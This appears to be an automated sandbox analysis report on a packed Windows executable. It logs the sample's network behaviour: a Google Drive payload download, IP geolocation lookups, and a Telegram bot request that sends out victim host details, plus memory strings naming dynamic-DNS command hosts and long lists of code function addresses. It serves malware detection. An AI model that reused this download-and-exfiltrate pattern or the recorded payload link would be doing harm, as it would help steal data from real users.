            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49724 version: TLS 1.0
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=19xFZwGXpJOSwPWK3hTC0Z2UBRNX2ducA HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=19xFZwGXpJOSwPWK3hTC0Z2UBRNX2ducA&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global traffic | HTTP traffic detected:
                GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:927537%0D%0ADate%20and%20Time:%2009/03/2025%20/%2001:02:15%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20927537%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                Host: api.telegram.org
                Connection: Keep-Alive
            Source: global traffic | HTTP traffic detected:
                GET / HTTP/1.1
                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                Host: checkip.dyndns.org
                Connection: Keep-Alive
            Source: global traffic | HTTP traffic detected:
                GET / HTTP/1.1
                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                Host: checkip.dyndns.org
            Source: global traffic | DNS traffic detected: DNS query: drive.google.com
            Source: global traffic | DNS traffic detected: DNS query: drive.usercontent.google.com
            Source: global traffic | DNS traffic detected: DNS query: checkip.dyndns.org
            Source: global traffic | DNS traffic detected: DNS query: reallyfreegeoip.org
            Source: global traffic | DNS traffic detected: DNS query: api.telegram.org
            Source: global traffic | HTTP traffic detected:
                HTTP/1.1 404 Not Found
                Server: nginx/1.18.0
                Date: Fri, 07 Mar 2025 22:29:57 GMT
                Content-Type: application/json
                Content-Length: 55
                Connection: close
                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                Access-Control-Allow-Origin: *
                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
            Source: OW1i3n5K3s.exe, 00000008.00000002.2505212840.0000000032E81000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://aborters.duckdns.org:8081
            Source: OW1i3n5K3s.exe, 00000008.00000002.2505212840.0000000032E81000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://anotherarmy.dns.army:8081
            Source: OW1i3n5K3s.exe, 00000008.00000002.2505212840.0000000033063000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://api.telegram.org
            Source: OW1i3n5K3s.exe, 00000008.00000002.2505212840.000000003303E000.00000004.00000800.00020000.00000000.sdmp, OW1i3n5K3s.exe, 00000008.00000002.2505212840.000000003302B000.00000004.00000800.00020000.00000000.sdmp, OW1i3n5K3s.exe, 00000008.00000002.2505212840.000000003304C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.com
            Source: OW1i3n5K3s.exe, 00000008.00000002.2505212840.000000003303E000.00000004.00000800.00020000.00000000.sdmp, OW1i3n5K3s.exe, 00000008.00000002.2505212840.000000003302B000.00000004.00000800.00020000.00000000.sdmp, OW1i3n5K3s.exe, 00000008.00000002.2505212840.000000003304C000.00000004.00000800.00020000.00000000.sdmp, OW1i3n5K3s.exe, 00000008.00000002.2505212840.0000000032E81000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org
            Source: OW1i3n5K3s.exe, 00000008.00000002.2505212840.0000000032E81000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/
            Source: OW1i3n5K3s.exe | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: OW1i3n5K3s.exe, 00000008.00000002.2505212840.000000003303E000.00000004.00000800.00020000.00000000.sdmp, OW1i3n5K3s.exe, 00000008.00000002.2505212840.000000003302B000.00000004.00000800.00020000.00000000.sdmp, OW1i3n5K3s.exe, 00000008.00000002.2505212840.000000003304C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://reallyfreegeoip.org
            Source: OW1i3n5K3s.exe, 00000008.00000002.2505212840.0000000032E81000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: OW1i3n5K3s.exe, 00000008.00000002.2505212840.0000000032E81000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://varders.kozow.com:8081
            Source: OW1i3n5K3s.exe, 00000008.00000002.2507519072.000000003414F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org?q=
            Source: OW1i3n5K3s.exe, 00000008.00000002.2505212840.0000000033063000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram
            Source: OW1i3n5K3s.exe, 00000008.00000002.2505212840.0000000033063000.00000004.00000800.00020000.00000000.sdmp, OW1i3n5K3s.exe, 00000008.00000002.2505212840.0000000032F66000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org
            Source: OW1i3n5K3s.exe, 00000008.00000002.2505212840.000000003305B000.00000004.00000800.00020000.00000000.sdmp, OW1i3n5K3s.exe, 00000008.00000002.2505212840.0000000032F66000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot
            Source: OW1i3n5K3s.exe, 00000008.00000002.2505212840.000000003305B000.00000004.00000800.00020000.00000000.sdmp, OW1i3n5K3s.exe, 00000008.00000002.2505212840.0000000032F66000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
            Source: OW1i3n5K3s.exe, 00000008.00000002.2505212840.0000000033063000.00000004.00000800.00020000.00000000.sdmp, OW1i3n5K3s.exe, 00000008.00000002.2505212840.000000003305B000.00000004.00000800.00020000.00000000.sdmp, OW1i3n5K3s.exe, 00000008.00000002.2505212840.0000000032F66000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:927537%0D%0ADate%20a
            Source: OW1i3n5K3s.exe, 00000008.00000003.1403195156.0000000002647000.00000004.00000020.00020000.00000000.sdmp, OW1i3n5K3s.exe, 00000008.00000003.1403547568.0000000002647000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://apis.google.com
            Source: OW1i3n5K3s.exe, 00000008.00000002.2507519072.000000003414F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: OW1i3n5K3s.exe, 00000008.00000002.2507519072.000000003414F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: OW1i3n5K3s.exe, 00000008.00000002.2507519072.000000003414F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: OW1i3n5K3s.exe, 00000008.00000002.2505212840.0000000032FED000.00000004.00000800.00020000.00000000.sdmp, OW1i3n5K3s.exe, 00000008.00000002.2505212840.000000003301E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://chrome.google.com/webstore?hl=en
            Source: OW1i3n5K3s.exe, 00000008.00000002.2505212840.0000000032FED000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://chrome.google.com/webstore?hl=en4
            Source: OW1i3n5K3s.exe, 00000008.00000002.2505212840.0000000032FE8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
            Source: OW1i3n5K3s.exe, 00000008.00000002.2478960805.00000000025D8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.google.com/
            Source: OW1i3n5K3s.exe, 00000008.00000002.2480112081.0000000002C40000.00000004.00001000.00020000.00000000.sdmp, OW1i3n5K3s.exe, 00000008.00000002.2478960805.0000000002615000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.google.com/uc?export=download&id=19xFZwGXpJOSwPWK3hTC0Z2UBRNX2ducA
            Source: OW1i3n5K3s.exe, 00000008.00000003.1455368440.0000000002640000.00000004.00000020.00020000.00000000.sdmp, OW1i3n5K3s.exe, 00000008.00000002.2478960805.000000000263F000.00000004.00000020.00020000.00000000.sdmp, OW1i3n5K3s.exe, 00000008.00000003.1455467642.0000000002645000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.usercontent.google.com/
            Source: OW1i3n5K3s.exe, 00000008.00000003.1455368440.0000000002640000.00000004.00000020.00020000.00000000.sdmp, OW1i3n5K3s.exe, 00000008.00000002.2478960805.000000000263F000.00000004.00000020.00020000.00000000.sdmp, OW1i3n5K3s.exe, 00000008.00000003.1455467642.0000000002645000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.usercontent.google.com/5
            Source: OW1i3n5K3s.exe, 00000008.00000003.1403195156.0000000002647000.00000004.00000020.00020000.00000000.sdmp, OW1i3n5K3s.exe, 00000008.00000002.2478960805.0000000002629000.00000004.00000020.00020000.00000000.sdmp, OW1i3n5K3s.exe, 00000008.00000003.1403547568.0000000002647000.00000004.00000020.00020000.00000000.sdmp, OW1i3n5K3s.exe, 00000008.00000002.2478960805.0000000002615000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.usercontent.google.com/download?id=19xFZwGXpJOSwPWK3hTC0Z2UBRNX2ducA&export=download
            Source: OW1i3n5K3s.exe, 00000008.00000002.2507519072.000000003414F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: OW1i3n5K3s.exe, 00000008.00000002.2507519072.000000003414F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtabv20
            Source: OW1i3n5K3s.exe, 00000008.00000002.2507519072.000000003414F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: OW1i3n5K3s.exe, 00000008.00000002.2507519072.000000003414F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://gemini.google.com/app?q=
            Source: OW1i3n5K3s.exe, 00000008.00000002.2505212840.000000003303E000.00000004.00000800.00020000.00000000.sdmp, OW1i3n5K3s.exe, 00000008.00000002.2505212840.000000003302B000.00000004.00000800.00020000.00000000.sdmp, OW1i3n5K3s.exe, 00000008.00000002.2505212840.000000003304C000.00000004.00000800.00020000.00000000.sdmp, OW1i3n5K3s.exe, 00000008.00000002.2505212840.0000000032F3F000.00000004.00000800.00020000.00000000.sdmp, OW1i3n5K3s.exe, 00000008.00000002.2505212840.0000000032F66000.00000004.00000800.00020000.00000000.sdmp, OW1i3n5K3s.exe, 00000008.00000002.2505212840.0000000032ECF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org
            Source: OW1i3n5K3s.exe, 00000008.00000002.2505212840.0000000032ECF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/
            Source: OW1i3n5K3s.exe, 00000008.00000002.2505212840.0000000032ECF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
            Source: OW1i3n5K3s.exe, 00000008.00000002.2505212840.000000003303E000.00000004.00000800.00020000.00000000.sdmp, OW1i3n5K3s.exe, 00000008.00000002.2505212840.000000003302B000.00000004.00000800.00020000.00000000.sdmp, OW1i3n5K3s.exe, 00000008.00000002.2505212840.000000003304C000.00000004.00000800.00020000.00000000.sdmp, OW1i3n5K3s.exe, 00000008.00000002.2505212840.0000000032F3F000.00000004.00000800.00020000.00000000.sdmp, OW1i3n5K3s.exe, 00000008.00000002.2505212840.0000000032EF9000.00000004.00000800.00020000.00000000.sdmp, OW1i3n5K3s.exe, 00000008.00000002.2505212840.0000000032F66000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
            Source: OW1i3n5K3s.exe, 00000008.00000003.1403195156.0000000002647000.00000004.00000020.00020000.00000000.sdmp, OW1i3n5K3s.exe, 00000008.00000003.1403547568.0000000002647000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ssl.gstatic.com
            Source: OW1i3n5K3s.exe, 00000008.00000002.2507519072.000000003414F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/v20
            Source: OW1i3n5K3s.exe, 00000008.00000003.1403195156.0000000002647000.00000004.00000020.00020000.00000000.sdmp, OW1i3n5K3s.exe, 00000008.00000003.1403547568.0000000002647000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google-analytics.com;report-uri
            Source: OW1i3n5K3s.exe, 00000008.00000003.1403195156.0000000002647000.00000004.00000020.00020000.00000000.sdmp, OW1i3n5K3s.exe, 00000008.00000003.1403547568.0000000002647000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com
            Source: OW1i3n5K3s.exe, 00000008.00000002.2507519072.000000003414F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
            Source: OW1i3n5K3s.exe, 00000008.00000003.1403195156.0000000002647000.00000004.00000020.00020000.00000000.sdmp, OW1i3n5K3s.exe, 00000008.00000003.1403547568.0000000002647000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.googletagmanager.com
            Source: OW1i3n5K3s.exe, 00000008.00000003.1403195156.0000000002647000.00000004.00000020.00020000.00000000.sdmp, OW1i3n5K3s.exe, 00000008.00000003.1403547568.0000000002647000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.gstatic.com
            Source: OW1i3n5K3s.exe, 00000008.00000002.2505212840.000000003300F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.office.com/
            Source: OW1i3n5K3s.exe, 00000008.00000002.2505212840.000000003301E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.office.com/4
            Source: OW1i3n5K3s.exe, 00000008.00000002.2505212840.0000000033019000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.office.com/lB
            Source: unknown | Network traffic detected: HTTP traffic on port 49733 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49722
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49720
            Source: unknown | Network traffic detected: HTTP traffic on port 49731 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49740
            Source: unknown | Network traffic detected: HTTP traffic on port 49727 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49725 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49729 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49720 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49722 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49739
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49737
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49735
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49733
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49731
            Source: unknown | Network traffic detected: HTTP traffic on port 49740 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49724 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49729
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49727
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49725
            Source: unknown | Network traffic detected: HTTP traffic on port 49735 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49724
            Source: unknown | Network traffic detected: HTTP traffic on port 49737 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49739 -> 443
            Source: unknown | HTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.4:49720 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 172.217.16.129:443 -> 192.168.2.4:49722 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49740 version: TLS 1.2
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | Code function: 1_2_00405846 GetDlgItem, GetDlgItem, GetDlgItem, GetDlgItem, GetClientRect, GetSystemMetrics, SendMessageW, SendMessageW, SendMessageW, SendMessageW, SendMessageW, SendMessageW, ShowWindow, ShowWindow, GetDlgItem, SendMessageW, SendMessageW, SendMessageW, GetDlgItem, CreateThread, CloseHandle, ShowWindow, ShowWindow, ShowWindow, ShowWindow, SendMessageW, CreatePopupMenu, AppendMenuW, GetWindowRect, TrackPopupMenu, SendMessageW, OpenClipboard, EmptyClipboard, GlobalAlloc, GlobalLock, SendMessageW, GlobalUnlock, SetClipboardData, CloseClipboard
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | Code function: 1_2_00403645 EntryPoint, SetErrorMode, GetVersionExW, GetVersionExW, GetVersionExW, lstrlenA, #17, OleInitialize, SHGetFileInfoW, GetCommandLineW, CharNextW, GetTempPathW, GetTempPathW, GetWindowsDirectoryW, lstrcatW, GetTempPathW, lstrcatW, SetEnvironmentVariableW, SetEnvironmentVariableW, SetEnvironmentVariableW, DeleteFileW, lstrlenW, wsprintfW, GetFileAttributesW, DeleteFileW, SetCurrentDirectoryW, CopyFileW, OleUninitialize, ExitProcess, CloseHandle, GetCurrentProcess, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, ExitWindowsEx, ExitProcess
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | Code function: 8_2_00403645 EntryPoint, SetErrorMode, GetVersionExW, GetVersionExW, GetVersionExW, lstrlenA, #17, OleInitialize, SHGetFileInfoW, GetCommandLineW, CharNextW, GetTempPathW, GetTempPathW, GetWindowsDirectoryW, lstrcatW, GetTempPathW, lstrcatW, SetEnvironmentVariableW, SetEnvironmentVariableW, SetEnvironmentVariableW, DeleteFileW, lstrlenW, wsprintfW, GetFileAttributesW, DeleteFileW, SetCurrentDirectoryW, CopyFileW, OleUninitialize, ExitProcess, CloseHandle, GetCurrentProcess, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, ExitWindowsEx, ExitProcess
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | File created: C:\Windows\resources\0809
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_36172BB08_2_36172BB0
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_3617B7B08_2_3617B7B0
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_361797B08_2_361797B0
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_36178FA18_2_36178FA1
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_361711A08_2_361711A0
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_3617D7A08_2_3617D7A0
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_3617B7A08_2_3617B7A0
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_36172BAF8_2_36172BAF
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_3617E9D08_2_3617E9D0
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_36175BD88_2_36175BD8
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_361797C08_2_361797C0
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_3617C9F08_2_3617C9F0
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_3617A9F08_2_3617A9F0
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_36172FF98_2_36172FF9
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_361715F88_2_361715F8
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_3617E9E08_2_3617E9E0
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_3617C9E08_2_3617C9E0
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_361715E88_2_361715E8
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_361E4B208_2_361E4B20
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_361E12488_2_361E1248
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_361E4FE88_2_361E4FE8
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_361EA11F8_2_361EA11F
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_361E4B1D8_2_361E4B1D
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_361E29188_2_361E2918
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_361EB9188_2_361EB918
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_361E09188_2_361E0918
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_361E76188_2_361E7618
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_361EE4128_2_361EE412
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_361E8E108_2_361E8E10
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_361E290A8_2_361E290A
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_361E63088_2_361E6308
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_361EFC088_2_361EFC08
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_361E00068_2_361E0006
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_361EB9078_2_361EB907
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_361ED1008_2_361ED100
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_361E8E008_2_361E8E00
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_361E32388_2_361E3238
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_361ECC388_2_361ECC38
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_361E12378_2_361E1237
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_361E89378_2_361E8937
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_361EA1308_2_361EA130
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_361E322E8_2_361E322E
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_361E5E2F8_2_361E5E2F
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_361EF72F8_2_361EF72F
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_361E09288_2_361E0928
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_361E76288_2_361E7628
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_361ECC278_2_361ECC27
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_361EE4208_2_361EE420
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_361E9C5A8_2_361E9C5A
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_361E3B588_2_361E3B58
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_361EDF588_2_361EDF58
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_361E1B588_2_361E1B58
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_361EB4508_2_361EB450
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_361E71508_2_361E7150
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_361E89488_2_361E8948
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_361E3B488_2_361E3B48
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_361EDF488_2_361EDF48
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_361EB4428_2_361EB442
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_361E00408_2_361E0040
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_361E5E408_2_361E5E40
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_361EF7408_2_361EF740
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_361EDA7F8_2_361EDA7F
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_361E44788_2_361E4478
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_361E59788_2_361E5978
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_361EF2788_2_361EF278
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_361EAF788_2_361EAF78
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_361EC7708_2_361EC770
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_361E84708_2_361E8470
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_361E596A8_2_361E596A
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_361E1B688_2_361E1B68
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_361E9C688_2_361E9C68
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_361EF2688_2_361EF268
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_361EC7698_2_361EC769
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_361E44678_2_361E4467
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_361E71608_2_361E7160
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_361EED9F8_2_361EED9F
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_361E2D9A8_2_361E2D9A
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_361E979A8_2_361E979A
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_361E04988_2_361E0498
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_361E6C988_2_361E6C98
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_361EC2978_2_361EC297
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_361EDA908_2_361EDA90
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_361E24888_2_361E2488
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_361EAF888_2_361EAF88
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_361E6C888_2_361E6C88
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_361E04898_2_361E0489
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_361E24858_2_361E2485
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_361E84808_2_361E8480
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_361E67BF8_2_361E67BF
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_361E36BA8_2_361E36BA
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_361E0DB88_2_361E0DB8
